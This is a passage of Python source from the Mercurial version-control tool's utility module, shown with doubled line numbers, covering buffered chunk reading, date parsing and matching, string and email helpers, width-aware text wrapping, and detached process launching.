1895 1895 yield chunk[pos:end]
1896 1896 pos = end
1897 1897 else:
1898 1898 yield chunk
1899 1899 self.iter = splitbig(in_iter)
1900 1900 self._queue = collections.deque()
1901 1901 self._chunkoffset = 0
1902 1902
1903 1903 def read(self, l=None):
1904 1904 """Read L bytes of data from the iterator of chunks of data.
1905 1905 Returns less than L bytes if the iterator runs dry.
1906 1906
1907 1907 If size parameter is omitted, read everything"""
1908 1908 if l is None:
1909 1909 return ''.join(self.iter)
1910 1910
1911 1911 left = l
1912 1912 buf = []
1913 1913 queue = self._queue
1914 1914 while left > 0:
1915 1915 # refill the queue
1916 1916 if not queue:
1917 1917 target = 2**18
1918 1918 for chunk in self.iter:
1919 1919 queue.append(chunk)
1920 1920 target -= len(chunk)
1921 1921 if target <= 0:
1922 1922 break
1923 1923 if not queue:
1924 1924 break
1925 1925
1926 1926 # The easy way to do this would be to queue.popleft(), modify the
1927 1927 # chunk (if necessary), then queue.appendleft(). However, for cases
1928 1928 # where we read partial chunk content, this incurs 2 dequeue
1929 1929 # mutations and creates a new str for the remaining chunk in the
1930 1930 # queue. Our code below avoids this overhead.
1931 1931
1932 1932 chunk = queue[0]
1933 1933 chunkl = len(chunk)
1934 1934 offset = self._chunkoffset
1935 1935
1936 1936 # Use full chunk.
1937 1937 if offset == 0 and left >= chunkl:
1938 1938 left -= chunkl
1939 1939 queue.popleft()
1940 1940 buf.append(chunk)
1941 1941 # self._chunkoffset remains at 0.
1942 1942 continue
1943 1943
1944 1944 chunkremaining = chunkl - offset
1945 1945
1946 1946 # Use all of unconsumed part of chunk.
1947 1947 if left >= chunkremaining:
1948 1948 left -= chunkremaining
1949 1949 queue.popleft()
1950 1950 # offset == 0 is enabled by block above, so this won't merely
1951 1951 # copy via ``chunk[0:]``.
1952 1952 buf.append(chunk[offset:])
1953 1953 self._chunkoffset = 0
1954 1954
1955 1955 # Partial chunk needed.
1956 1956 else:
1957 1957 buf.append(chunk[offset:offset + left])
1958 1958 self._chunkoffset += left
1959 1959 left -= chunkremaining
1960 1960
1961 1961 return ''.join(buf)
1962 1962
1963 1963 def filechunkiter(f, size=131072, limit=None):
1964 1964 """Create a generator that produces the data in the file size
1965 1965 (default 131072) bytes at a time, up to optional limit (default is
1966 1966 to read all data). Chunks may be less than size bytes if the
1967 1967 chunk is the last chunk in the file, or the file is a socket or
1968 1968 some other type of file that sometimes reads less data than is
1969 1969 requested."""
1970 1970 assert size >= 0
1971 1971 assert limit is None or limit >= 0
1972 1972 while True:
1973 1973 if limit is None:
1974 1974 nbytes = size
1975 1975 else:
1976 1976 nbytes = min(limit, size)
1977 1977 s = nbytes and f.read(nbytes)
1978 1978 if not s:
1979 1979 break
1980 1980 if limit:
1981 1981 limit -= len(s)
1982 1982 yield s
1983 1983
1984 1984 class cappedreader(object):
1985 1985 """A file object proxy that allows reading up to N bytes.
1986 1986
1987 1987 Given a source file object, instances of this type allow reading up to
1988 1988 N bytes from that source file object. Attempts to read past the allowed
1989 1989 limit are treated as EOF.
1990 1990
1991 1991 It is assumed that I/O is not performed on the original file object
1992 1992 in addition to I/O that is performed by this instance. If there is,
1993 1993 state tracking will get out of sync and unexpected results will ensue.
1994 1994 """
1995 1995 def __init__(self, fh, limit):
1996 1996 """Allow reading up to <limit> bytes from <fh>."""
1997 1997 self._fh = fh
1998 1998 self._left = limit
1999 1999
2000 2000 def read(self, n=-1):
2001 2001 if not self._left:
2002 2002 return b''
2003 2003
2004 2004 if n < 0:
2005 2005 n = self._left
2006 2006
2007 2007 data = self._fh.read(min(n, self._left))
2008 2008 self._left -= len(data)
2009 2009 assert self._left >= 0
2010 2010
2011 2011 return data
2012 2012
2013 2013 def makedate(timestamp=None):
2014 2014 '''Return a unix timestamp (or the current time) as a (unixtime,
2015 2015 offset) tuple based off the local timezone.'''
2016 2016 if timestamp is None:
2017 2017 timestamp = time.time()
2018 2018 if timestamp < 0:
2019 2019 hint = _("check your clock")
2020 2020 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
2021 2021 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
2022 2022 datetime.datetime.fromtimestamp(timestamp))
2023 2023 tz = delta.days * 86400 + delta.seconds
2024 2024 return timestamp, tz
2025 2025
2026 2026 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
2027 2027 """represent a (unixtime, offset) tuple as a localized time.
2028 2028 unixtime is seconds since the epoch, and offset is the time zone's
2029 2029 number of seconds away from UTC.
2030 2030
2031 2031 >>> datestr((0, 0))
2032 2032 'Thu Jan 01 00:00:00 1970 +0000'
2033 2033 >>> datestr((42, 0))
2034 2034 'Thu Jan 01 00:00:42 1970 +0000'
2035 2035 >>> datestr((-42, 0))
2036 2036 'Wed Dec 31 23:59:18 1969 +0000'
2037 2037 >>> datestr((0x7fffffff, 0))
2038 2038 'Tue Jan 19 03:14:07 2038 +0000'
2039 2039 >>> datestr((-0x80000000, 0))
2040 2040 'Fri Dec 13 20:45:52 1901 +0000'
2041 2041 """
2042 2042 t, tz = date or makedate()
2043 2043 if "%1" in format or "%2" in format or "%z" in format:
2044 2044 sign = (tz > 0) and "-" or "+"
2045 2045 minutes = abs(tz) // 60
2046 2046 q, r = divmod(minutes, 60)
2047 2047 format = format.replace("%z", "%1%2")
2048 2048 format = format.replace("%1", "%c%02d" % (sign, q))
2049 2049 format = format.replace("%2", "%02d" % r)
2050 2050 d = t - tz
2051 2051 if d > 0x7fffffff:
2052 2052 d = 0x7fffffff
2053 2053 elif d < -0x80000000:
2054 2054 d = -0x80000000
2055 2055 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
2056 2056 # because they use the gmtime() system call which is buggy on Windows
2057 2057 # for negative values.
2058 2058 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
2059 2059 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
2060 2060 return s
2061 2061
2062 2062 def shortdate(date=None):
2063 2063 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2064 2064 return datestr(date, format='%Y-%m-%d')
2065 2065
2066 2066 def parsetimezone(s):
2067 2067 """find a trailing timezone, if any, in string, and return a
2068 2068 (offset, remainder) pair"""
2069 2069
2070 2070 if s.endswith("GMT") or s.endswith("UTC"):
2071 2071 return 0, s[:-3].rstrip()
2072 2072
2073 2073 # Unix-style timezones [+-]hhmm
2074 2074 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2075 2075 sign = (s[-5] == "+") and 1 or -1
2076 2076 hours = int(s[-4:-2])
2077 2077 minutes = int(s[-2:])
2078 2078 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2079 2079
2080 2080 # ISO8601 trailing Z
2081 2081 if s.endswith("Z") and s[-2:-1].isdigit():
2082 2082 return 0, s[:-1]
2083 2083
2084 2084 # ISO8601-style [+-]hh:mm
2085 2085 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2086 2086 s[-5:-3].isdigit() and s[-2:].isdigit()):
2087 2087 sign = (s[-6] == "+") and 1 or -1
2088 2088 hours = int(s[-5:-3])
2089 2089 minutes = int(s[-2:])
2090 2090 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2091 2091
2092 2092 return None, s
2093 2093
2094 2094 def strdate(string, format, defaults=None):
2095 2095 """parse a localized time string and return a (unixtime, offset) tuple.
2096 2096 if the string cannot be parsed, ValueError is raised."""
2097 2097 if defaults is None:
2098 2098 defaults = {}
2099 2099
2100 2100 # NOTE: unixtime = localunixtime + offset
2101 2101 offset, date = parsetimezone(string)
2102 2102
2103 2103 # add missing elements from defaults
2104 2104 usenow = False # default to using biased defaults
2105 2105 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2106 2106 part = pycompat.bytestr(part)
2107 2107 found = [True for p in part if ("%"+p) in format]
2108 2108 if not found:
2109 2109 date += "@" + defaults[part][usenow]
2110 2110 format += "@%" + part[0]
2111 2111 else:
2112 2112 # We've found a specific time element, less specific time
2113 2113 # elements are relative to today
2114 2114 usenow = True
2115 2115
2116 2116 timetuple = time.strptime(encoding.strfromlocal(date),
2117 2117 encoding.strfromlocal(format))
2118 2118 localunixtime = int(calendar.timegm(timetuple))
2119 2119 if offset is None:
2120 2120 # local timezone
2121 2121 unixtime = int(time.mktime(timetuple))
2122 2122 offset = unixtime - localunixtime
2123 2123 else:
2124 2124 unixtime = localunixtime + offset
2125 2125 return unixtime, offset
2126 2126
2127 2127 def parsedate(date, formats=None, bias=None):
2128 2128 """parse a localized date/time and return a (unixtime, offset) tuple.
2129 2129
2130 2130 The date may be a "unixtime offset" string or in one of the specified
2131 2131 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2132 2132
2133 2133 >>> parsedate(b' today ') == parsedate(
2134 2134 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2135 2135 True
2136 2136 >>> parsedate(b'yesterday ') == parsedate(
2137 2137 ... (datetime.date.today() - datetime.timedelta(days=1)
2138 2138 ... ).strftime('%b %d').encode('ascii'))
2139 2139 True
2140 2140 >>> now, tz = makedate()
2141 2141 >>> strnow, strtz = parsedate(b'now')
2142 2142 >>> (strnow - now) < 1
2143 2143 True
2144 2144 >>> tz == strtz
2145 2145 True
2146 2146 """
2147 2147 if bias is None:
2148 2148 bias = {}
2149 2149 if not date:
2150 2150 return 0, 0
2151 2151 if isinstance(date, tuple) and len(date) == 2:
2152 2152 return date
2153 2153 if not formats:
2154 2154 formats = defaultdateformats
2155 2155 date = date.strip()
2156 2156
2157 2157 if date == 'now' or date == _('now'):
2158 2158 return makedate()
2159 2159 if date == 'today' or date == _('today'):
2160 2160 date = datetime.date.today().strftime(r'%b %d')
2161 2161 date = encoding.strtolocal(date)
2162 2162 elif date == 'yesterday' or date == _('yesterday'):
2163 2163 date = (datetime.date.today() -
2164 2164 datetime.timedelta(days=1)).strftime(r'%b %d')
2165 2165 date = encoding.strtolocal(date)
2166 2166
2167 2167 try:
2168 2168 when, offset = map(int, date.split(' '))
2169 2169 except ValueError:
2170 2170 # fill out defaults
2171 2171 now = makedate()
2172 2172 defaults = {}
2173 2173 for part in ("d", "mb", "yY", "HI", "M", "S"):
2174 2174 # this piece is for rounding the specific end of unknowns
2175 2175 b = bias.get(part)
2176 2176 if b is None:
2177 2177 if part[0:1] in "HMS":
2178 2178 b = "00"
2179 2179 else:
2180 2180 b = "0"
2181 2181
2182 2182 # this piece is for matching the generic end to today's date
2183 2183 n = datestr(now, "%" + part[0:1])
2184 2184
2185 2185 defaults[part] = (b, n)
2186 2186
2187 2187 for format in formats:
2188 2188 try:
2189 2189 when, offset = strdate(date, format, defaults)
2190 2190 except (ValueError, OverflowError):
2191 2191 pass
2192 2192 else:
2193 2193 break
2194 2194 else:
2195 2195 raise error.ParseError(_('invalid date: %r') % date)
2196 2196 # validate explicit (probably user-specified) date and
2197 2197 # time zone offset. values must fit in signed 32 bits for
2198 2198 # current 32-bit linux runtimes. timezones go from UTC-12
2199 2199 # to UTC+14
2200 2200 if when < -0x80000000 or when > 0x7fffffff:
2201 2201 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2202 2202 if offset < -50400 or offset > 43200:
2203 2203 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2204 2204 return when, offset
2205 2205
2206 2206 def matchdate(date):
2207 2207 """Return a function that matches a given date match specifier
2208 2208
2209 2209 Formats include:
2210 2210
2211 2211 '{date}' match a given date to the accuracy provided
2212 2212
2213 2213 '<{date}' on or before a given date
2214 2214
2215 2215 '>{date}' on or after a given date
2216 2216
2217 2217 >>> p1 = parsedate(b"10:29:59")
2218 2218 >>> p2 = parsedate(b"10:30:00")
2219 2219 >>> p3 = parsedate(b"10:30:59")
2220 2220 >>> p4 = parsedate(b"10:31:00")
2221 2221 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2222 2222 >>> f = matchdate(b"10:30")
2223 2223 >>> f(p1[0])
2224 2224 False
2225 2225 >>> f(p2[0])
2226 2226 True
2227 2227 >>> f(p3[0])
2228 2228 True
2229 2229 >>> f(p4[0])
2230 2230 False
2231 2231 >>> f(p5[0])
2232 2232 False
2233 2233 """
2234 2234
2235 2235 def lower(date):
2236 2236 d = {'mb': "1", 'd': "1"}
2237 2237 return parsedate(date, extendeddateformats, d)[0]
2238 2238
2239 2239 def upper(date):
2240 2240 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2241 2241 for days in ("31", "30", "29"):
2242 2242 try:
2243 2243 d["d"] = days
2244 2244 return parsedate(date, extendeddateformats, d)[0]
2245 2245 except error.ParseError:
2246 2246 pass
2247 2247 d["d"] = "28"
2248 2248 return parsedate(date, extendeddateformats, d)[0]
2249 2249
2250 2250 date = date.strip()
2251 2251
2252 2252 if not date:
2253 2253 raise Abort(_("dates cannot consist entirely of whitespace"))
2254 2254 elif date[0] == "<":
2255 2255 if not date[1:]:
2256 2256 raise Abort(_("invalid day spec, use '<DATE'"))
2257 2257 when = upper(date[1:])
2258 2258 return lambda x: x <= when
2259 2259 elif date[0] == ">":
2260 2260 if not date[1:]:
2261 2261 raise Abort(_("invalid day spec, use '>DATE'"))
2262 2262 when = lower(date[1:])
2263 2263 return lambda x: x >= when
2264 2264 elif date[0] == "-":
2265 2265 try:
2266 2266 days = int(date[1:])
2267 2267 except ValueError:
2268 2268 raise Abort(_("invalid day spec: %s") % date[1:])
2269 2269 if days < 0:
2270 2270 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2271 2271 % date[1:])
2272 2272 when = makedate()[0] - days * 3600 * 24
2273 2273 return lambda x: x >= when
2274 2274 elif " to " in date:
2275 2275 a, b = date.split(" to ")
2276 2276 start, stop = lower(a), upper(b)
2277 2277 return lambda x: x >= start and x <= stop
2278 2278 else:
2279 2279 start, stop = lower(date), upper(date)
2280 2280 return lambda x: x >= start and x <= stop
2281 2281
2282 2282 def stringmatcher(pattern, casesensitive=True):
2283 2283 """
2284 2284 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2285 2285 returns the matcher name, pattern, and matcher function.
2286 2286 missing or unknown prefixes are treated as literal matches.
2287 2287
2288 2288 helper for tests:
2289 2289 >>> def test(pattern, *tests):
2290 2290 ... kind, pattern, matcher = stringmatcher(pattern)
2291 2291 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2292 2292 >>> def itest(pattern, *tests):
2293 2293 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2294 2294 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2295 2295
2296 2296 exact matching (no prefix):
2297 2297 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2298 2298 ('literal', 'abcdefg', [False, False, True])
2299 2299
2300 2300 regex matching ('re:' prefix)
2301 2301 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2302 2302 ('re', 'a.+b', [False, False, True])
2303 2303
2304 2304 force exact matches ('literal:' prefix)
2305 2305 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2306 2306 ('literal', 're:foobar', [False, True])
2307 2307
2308 2308 unknown prefixes are ignored and treated as literals
2309 2309 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2310 2310 ('literal', 'foo:bar', [False, False, True])
2311 2311
2312 2312 case insensitive regex matches
2313 2313 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2314 2314 ('re', 'A.+b', [False, False, True])
2315 2315
2316 2316 case insensitive literal matches
2317 2317 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2318 2318 ('literal', 'ABCDEFG', [False, False, True])
2319 2319 """
2320 2320 if pattern.startswith('re:'):
2321 2321 pattern = pattern[3:]
2322 2322 try:
2323 2323 flags = 0
2324 2324 if not casesensitive:
2325 2325 flags = remod.I
2326 2326 regex = remod.compile(pattern, flags)
2327 2327 except remod.error as e:
2328 2328 raise error.ParseError(_('invalid regular expression: %s')
2329 2329 % e)
2330 2330 return 're', pattern, regex.search
2331 2331 elif pattern.startswith('literal:'):
2332 2332 pattern = pattern[8:]
2333 2333
2334 2334 match = pattern.__eq__
2335 2335
2336 2336 if not casesensitive:
2337 2337 ipat = encoding.lower(pattern)
2338 2338 match = lambda s: ipat == encoding.lower(s)
2339 2339 return 'literal', pattern, match
2340 2340
2341 2341 def shortuser(user):
2342 2342 """Return a short representation of a user name or email address."""
2343 2343 f = user.find('@')
2344 2344 if f >= 0:
2345 2345 user = user[:f]
2346 2346 f = user.find('<')
2347 2347 if f >= 0:
2348 2348 user = user[f + 1:]
2349 2349 f = user.find(' ')
2350 2350 if f >= 0:
2351 2351 user = user[:f]
2352 2352 f = user.find('.')
2353 2353 if f >= 0:
2354 2354 user = user[:f]
2355 2355 return user
2356 2356
2357 2357 def emailuser(user):
2358 2358 """Return the user portion of an email address."""
2359 2359 f = user.find('@')
2360 2360 if f >= 0:
2361 2361 user = user[:f]
2362 2362 f = user.find('<')
2363 2363 if f >= 0:
2364 2364 user = user[f + 1:]
2365 2365 return user
2366 2366
2367 2367 def email(author):
2368 2368 '''get email of author.'''
2369 2369 r = author.find('>')
2370 2370 if r == -1:
2371 2371 r = None
2372 2372 return author[author.find('<') + 1:r]
2373 2373
2374 2374 def ellipsis(text, maxlength=400):
2375 2375 """Trim string to at most maxlength (default: 400) columns in display."""
2376 2376 return encoding.trim(text, maxlength, ellipsis='...')
2377 2377
2378 2378 def unitcountfn(*unittable):
2379 2379 '''return a function that renders a readable count of some quantity'''
2380 2380
2381 2381 def go(count):
2382 2382 for multiplier, divisor, format in unittable:
2383 2383 if abs(count) >= divisor * multiplier:
2384 2384 return format % (count / float(divisor))
2385 2385 return unittable[-1][2] % count
2386 2386
2387 2387 return go
2388 2388
2389 2389 def processlinerange(fromline, toline):
2390 2390 """Check that linerange <fromline>:<toline> makes sense and return a
2391 2391 0-based range.
2392 2392
2393 2393 >>> processlinerange(10, 20)
2394 2394 (9, 20)
2395 2395 >>> processlinerange(2, 1)
2396 2396 Traceback (most recent call last):
2397 2397 ...
2398 2398 ParseError: line range must be positive
2399 2399 >>> processlinerange(0, 5)
2400 2400 Traceback (most recent call last):
2401 2401 ...
2402 2402 ParseError: fromline must be strictly positive
2403 2403 """
2404 2404 if toline - fromline < 0:
2405 2405 raise error.ParseError(_("line range must be positive"))
2406 2406 if fromline < 1:
2407 2407 raise error.ParseError(_("fromline must be strictly positive"))
2408 2408 return fromline - 1, toline
2409 2409
2410 2410 bytecount = unitcountfn(
2411 2411 (100, 1 << 30, _('%.0f GB')),
2412 2412 (10, 1 << 30, _('%.1f GB')),
2413 2413 (1, 1 << 30, _('%.2f GB')),
2414 2414 (100, 1 << 20, _('%.0f MB')),
2415 2415 (10, 1 << 20, _('%.1f MB')),
2416 2416 (1, 1 << 20, _('%.2f MB')),
2417 2417 (100, 1 << 10, _('%.0f KB')),
2418 2418 (10, 1 << 10, _('%.1f KB')),
2419 2419 (1, 1 << 10, _('%.2f KB')),
2420 2420 (1, 1, _('%.0f bytes')),
2421 2421 )
2422 2422
2423 2423 # Matches a single EOL which can either be a CRLF where repeated CR
2424 2424 # are removed or a LF. We do not care about old Macintosh files, so a
2425 2425 # stray CR is an error.
2426 2426 _eolre = remod.compile(br'\r*\n')
2427 2427
2428 2428 def tolf(s):
2429 2429 return _eolre.sub('\n', s)
2430 2430
2431 2431 def tocrlf(s):
2432 2432 return _eolre.sub('\r\n', s)
2433 2433
2434 2434 if pycompat.oslinesep == '\r\n':
2435 2435 tonativeeol = tocrlf
2436 2436 fromnativeeol = tolf
2437 2437 else:
2438 2438 tonativeeol = pycompat.identity
2439 2439 fromnativeeol = pycompat.identity
2440 2440
2441 2441 def escapestr(s):
2442 2442 # call underlying function of s.encode('string_escape') directly for
2443 2443 # Python 3 compatibility
2444 2444 return codecs.escape_encode(s)[0]
2445 2445
2446 2446 def unescapestr(s):
2447 2447 return codecs.escape_decode(s)[0]
2448 2448
2449 2449 def forcebytestr(obj):
2450 2450 """Portably format an arbitrary object (e.g. exception) into a byte
2451 2451 string."""
2452 2452 try:
2453 2453 return pycompat.bytestr(obj)
2454 2454 except UnicodeEncodeError:
2455 2455 # non-ascii string, may be lossy
2456 2456 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2457 2457
2458 2458 def uirepr(s):
2459 2459 # Avoid double backslash in Windows path repr()
2460 2460 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2461 2461
2462 2462 # delay import of textwrap
2463 2463 def MBTextWrapper(**kwargs):
2464 2464 class tw(textwrap.TextWrapper):
2465 2465 """
2466 2466 Extend TextWrapper for width-awareness.
2467 2467
2468 2468 Neither number of 'bytes' in any encoding nor 'characters' is
2469 2469 appropriate to calculate terminal columns for specified string.
2470 2470
2471 2471 Original TextWrapper implementation uses built-in 'len()' directly,
2472 2472 so overriding is needed to use width information of each characters.
2473 2473
2474 2474 In addition, characters classified into 'ambiguous' width are
2475 2475 treated as wide in East Asian area, but as narrow in other.
2476 2476
2477 2477 This requires use decision to determine width of such characters.
2478 2478 """
2479 2479 def _cutdown(self, ucstr, space_left):
2480 2480 l = 0
2481 2481 colwidth = encoding.ucolwidth
2482 2482 for i in xrange(len(ucstr)):
2483 2483 l += colwidth(ucstr[i])
2484 2484 if space_left < l:
2485 2485 return (ucstr[:i], ucstr[i:])
2486 2486 return ucstr, ''
2487 2487
2488 2488 # overriding of base class
2489 2489 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2490 2490 space_left = max(width - cur_len, 1)
2491 2491
2492 2492 if self.break_long_words:
2493 2493 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2494 2494 cur_line.append(cut)
2495 2495 reversed_chunks[-1] = res
2496 2496 elif not cur_line:
2497 2497 cur_line.append(reversed_chunks.pop())
2498 2498
2499 2499 # this overriding code is imported from TextWrapper of Python 2.6
2500 2500 # to calculate columns of string by 'encoding.ucolwidth()'
2501 2501 def _wrap_chunks(self, chunks):
2502 2502 colwidth = encoding.ucolwidth
2503 2503
2504 2504 lines = []
2505 2505 if self.width <= 0:
2506 2506 raise ValueError("invalid width %r (must be > 0)" % self.width)
2507 2507
2508 2508 # Arrange in reverse order so items can be efficiently popped
2509 2509 # from a stack of chucks.
2510 2510 chunks.reverse()
2511 2511
2512 2512 while chunks:
2513 2513
2514 2514 # Start the list of chunks that will make up the current line.
2515 2515 # cur_len is just the length of all the chunks in cur_line.
2516 2516 cur_line = []
2517 2517 cur_len = 0
2518 2518
2519 2519 # Figure out which static string will prefix this line.
2520 2520 if lines:
2521 2521 indent = self.subsequent_indent
2522 2522 else:
2523 2523 indent = self.initial_indent
2524 2524
2525 2525 # Maximum width for this line.
2526 2526 width = self.width - len(indent)
2527 2527
2528 2528 # First chunk on line is whitespace -- drop it, unless this
2529 2529 # is the very beginning of the text (i.e. no lines started yet).
2530 2530 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2531 2531 del chunks[-1]
2532 2532
2533 2533 while chunks:
2534 2534 l = colwidth(chunks[-1])
2535 2535
2536 2536 # Can at least squeeze this chunk onto the current line.
2537 2537 if cur_len + l <= width:
2538 2538 cur_line.append(chunks.pop())
2539 2539 cur_len += l
2540 2540
2541 2541 # Nope, this line is full.
2542 2542 else:
2543 2543 break
2544 2544
2545 2545 # The current line is full, and the next chunk is too big to
2546 2546 # fit on *any* line (not just this one).
2547 2547 if chunks and colwidth(chunks[-1]) > width:
2548 2548 self._handle_long_word(chunks, cur_line, cur_len, width)
2549 2549
2550 2550 # If the last chunk on this line is all whitespace, drop it.
2551 2551 if (self.drop_whitespace and
2552 2552 cur_line and cur_line[-1].strip() == r''):
2553 2553 del cur_line[-1]
2554 2554
2555 2555 # Convert current line back to a string and store it in list
2556 2556 # of all lines (return value).
2557 2557 if cur_line:
2558 2558 lines.append(indent + r''.join(cur_line))
2559 2559
2560 2560 return lines
2561 2561
2562 2562 global MBTextWrapper
2563 2563 MBTextWrapper = tw
2564 2564 return tw(**kwargs)
2565 2565
2566 2566 def wrap(line, width, initindent='', hangindent=''):
2567 2567 maxindent = max(len(hangindent), len(initindent))
2568 2568 if width <= maxindent:
2569 2569 # adjust for weird terminal size
2570 2570 width = max(78, maxindent + 1)
2571 2571 line = line.decode(pycompat.sysstr(encoding.encoding),
2572 2572 pycompat.sysstr(encoding.encodingmode))
2573 2573 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2574 2574 pycompat.sysstr(encoding.encodingmode))
2575 2575 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2576 2576 pycompat.sysstr(encoding.encodingmode))
2577 2577 wrapper = MBTextWrapper(width=width,
2578 2578 initial_indent=initindent,
2579 2579 subsequent_indent=hangindent)
2580 2580 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2581 2581
2582 2582 if (pyplatform.python_implementation() == 'CPython' and
2583 2583 sys.version_info < (3, 0)):
2584 2584 # There is an issue in CPython that some IO methods do not handle EINTR
2585 2585 # correctly. The following table shows what CPython version (and functions)
2586 2586 # are affected (buggy: has the EINTR bug, okay: otherwise):
2587 2587 #
2588 2588 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2589 2589 # --------------------------------------------------
2590 2590 # fp.__iter__ | buggy | buggy | okay
2591 2591 # fp.read* | buggy | okay [1] | okay
2592 2592 #
2593 2593 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2594 2594 #
2595 2595 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2596 2596 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2597 2597 #
2598 2598 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2599 2599 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2600 2600 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2601 2601 # fp.__iter__ but not other fp.read* methods.
2602 2602 #
2603 2603 # On modern systems like Linux, the "read" syscall cannot be interrupted
2604 2604 # when reading "fast" files like on-disk files. So the EINTR issue only
2605 2605 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2606 2606 # files approximately as "fast" files and use the fast (unsafe) code path,
2607 2607 # to minimize the performance impact.
2608 2608 if sys.version_info >= (2, 7, 4):
2609 2609 # fp.readline deals with EINTR correctly, use it as a workaround.
2610 2610 def _safeiterfile(fp):
2611 2611 return iter(fp.readline, '')
2612 2612 else:
2613 2613 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2614 2614 # note: this may block longer than necessary because of bufsize.
2615 2615 def _safeiterfile(fp, bufsize=4096):
2616 2616 fd = fp.fileno()
2617 2617 line = ''
2618 2618 while True:
2619 2619 try:
2620 2620 buf = os.read(fd, bufsize)
2621 2621 except OSError as ex:
2622 2622 # os.read only raises EINTR before any data is read
2623 2623 if ex.errno == errno.EINTR:
2624 2624 continue
2625 2625 else:
2626 2626 raise
2627 2627 line += buf
2628 2628 if '\n' in buf:
2629 2629 splitted = line.splitlines(True)
2630 2630 line = ''
2631 2631 for l in splitted:
2632 2632 if l[-1] == '\n':
2633 2633 yield l
2634 2634 else:
2635 2635 line = l
2636 2636 if not buf:
2637 2637 break
2638 2638 if line:
2639 2639 yield line
2640 2640
2641 2641 def iterfile(fp):
2642 2642 fastpath = True
2643 2643 if type(fp) is file:
2644 2644 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2645 2645 if fastpath:
2646 2646 return fp
2647 2647 else:
2648 2648 return _safeiterfile(fp)
2649 2649 else:
2650 2650 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2651 2651 def iterfile(fp):
2652 2652 return fp
2653 2653
2654 2654 def iterlines(iterator):
2655 2655 for chunk in iterator:
2656 2656 for line in chunk.splitlines():
2657 2657 yield line
2658 2658
2659 2659 def expandpath(path):
2660 2660 return os.path.expanduser(os.path.expandvars(path))
2661 2661
2662 2662 def hgcmd():
2663 2663 """Return the command used to execute current hg
2664 2664
2665 2665 This is different from hgexecutable() because on Windows we want
2666 2666 to avoid things opening new shell windows like batch files, so we
2667 2667 get either the python call or current executable.
2668 2668 """
2669 2669 if mainfrozen():
2670 2670 if getattr(sys, 'frozen', None) == 'macosx_app':
2671 2671 # Env variable set by py2app
2672 2672 return [encoding.environ['EXECUTABLEPATH']]
2673 2673 else:
2674 2674 return [pycompat.sysexecutable]
2675 2675 return gethgcmd()
2676 2676
2677 2677 def rundetached(args, condfn):
2678 2678 """Execute the argument list in a detached process.
2679 2679
2680 2680 condfn is a callable which is called repeatedly and should return
2681 2681 True once the child process is known to have started successfully.
2682 2682 At this point, the child process PID is returned. If the child
2683 2683 process fails to start or finishes before condfn() evaluates to
2684 2684 True, return -1.
2685 2685 """
2686 2686 # Windows case is easier because the child process is either
2687 2687 # successfully starting and validating the condition or exiting
2688 2688 # on failure. We just poll on its PID. On Unix, if the child
2689 2689 # process fails to start, it will be left in a zombie state until
2690 2690 # the parent wait on it, which we cannot do since we expect a long
2691 2691 # running process on success. Instead we listen for SIGCHLD telling
2692 2692 # us our child process terminated.
2693 2693 terminated = set()
2694 2694 def handler(signum, frame):
2695 2695 terminated.add(os.wait())
2696 2696 prevhandler = None
2697 2697 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2698 2698 if SIGCHLD is not None:
2699 2699 prevhandler = signal.signal(SIGCHLD, handler)
2700 2700 try:
2701 2701 pid = spawndetached(args)
2702 2702 while not condfn():
2703 2703 if ((pid in terminated or not testpid(pid))
2704 2704 and not condfn()):
2705 2705 return -1
2706 2706 time.sleep(0.1)
2707 2707 return pid
2708 2708 finally:
2709 2709 if prevhandler is not None:
2710 2710 signal.signal(signal.SIGCHLD, prevhandler)
2711 2711
2712 2712 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
